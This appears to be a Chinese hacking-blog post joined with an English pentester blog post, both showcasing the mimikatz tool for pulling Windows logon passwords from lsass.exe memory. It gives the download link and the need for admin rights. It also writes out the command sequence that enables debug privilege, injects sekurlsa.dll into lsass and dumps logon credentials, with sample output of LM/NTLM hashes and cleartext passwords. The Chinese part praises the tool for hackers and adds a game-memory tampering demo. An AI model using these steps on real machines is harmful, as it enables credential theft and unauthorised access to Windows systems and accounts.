32位 64位均可 不过在测试过程中 前掉至少得以ADMIN权限运行
法国黑客神器 mimikatz 直接读取管理员密码明文 通杀xp win2003 win7 win2008
http://blog.gentilkiwi.com/mimikatz
|
|
mimikatz_trunk.rar |
还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章
自己尝试了下用 win2008 r2 x64 来测试
![[国外神器]法国黑客神器 mimikatz 直接读取管理员密码 通杀xp win2003 win7 win2008 - 拉登哥哥 - K8拉登哥哥s Blog](http://www.8090sec.com/uploads/allimg/130106/16463I353-1.jpg)
最后测试成功 wdigest 就是我的明文密码
我还测过密码复杂度在14位以上
包含数字 大小写字母 特殊字符的密码
一样能抓出明文密码来
以前用 wce.exe 或 lslsass.exe 通常是只能从内存里顶多抓出active账号的 lm hash 和 ntlm hash
但用了这个神器抓出明文密码后
由此我们可以反推断 在 lsass.exe 里并不是只存有 lm hash 和 ntlm hash 而已
应该还存在有你的明文密码经过某种加密算法 (注意: 是加密算法 而不是hash算法 加密算法是可逆的 hash算法是不可逆的)
这样这个加密算法是可逆的 能被解密出明文
所以进程注入 lsass.exe 时 所调用的 sekurlsa.dll 应该包含了对应的解密算法
逆向功底比较好的童鞋可以尝试去逆向分析一下
然后这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器
可以提升进程权限 注入进程 读取进程内存等等
下面展示一个 读取扫雷游戏的内存的例子
![[国外神器]法国黑客神器 mimikatz 直接读取管理员密码 通杀xp win2003 win7 win2008 - 拉登哥哥 - K8拉登哥哥s Blog](http://www.8090sec.com/uploads/allimg/130106/16463H161-2.jpg)
我们还可以通过pause命令来挂起该进程 这个时候游戏的时间就静止了
![[国外神器]法国黑客神器 mimikatz 直接读取管理员密码 通杀xp win2003 win7 win2008 - 拉登哥哥 - K8拉登哥哥s Blog](http://www.8090sec.com/uploads/allimg/130106/16463I2X-3.jpg)
总之这个神器相当华丽 还有更多能力有待各黑阔们挖掘 =..=~
mimikatz: Tool To Recover Cleartext Passwords From Lsass
I meant to blog about this a while ago, but never got round to it.
Here’s a brief post about very cool feature of a tool called mimikatz.
I’m very grateful to the tool’s author for bringing it to my attention. Until that point, I didn’t realise it was possible to recover the cleartext passwords of logged on windows users. Something that I’m sure most pentesters would find very useful.
Here’s some sample output provided by the author:
mimikatz 1.0 x86 (pre-alpha) /* Traitement du Kiwi */
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 488
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz # @getLogonPasswords
Authentification Id : 0;434898
Package d'authentification : NTLM
Utilisateur principal : Gentil User
Domaine d'authentification : vm-w7-ult
msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
wdigest : password
tspkg : password
Authentification Id : 0;269806
Package d'authentification : NTLM
Utilisateur principal : Gentil Kiwi
Domaine d'authentification : vm-w7-ult
msv1_0 : lm{ d0e9aee149655a6075e4540af1f22d3b }, ntlm{ cc36cf7a8514893efccd332446158b1a }
wdigest : waza1234/
tspkg : waza1234/
I wondered why the cleartext password would need to be stored in LSASS – after all every pentester will tell you that you don’t need the password to authenticate, just the hash.
A bit of googling seems to indicate that wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash.
Posted in Blog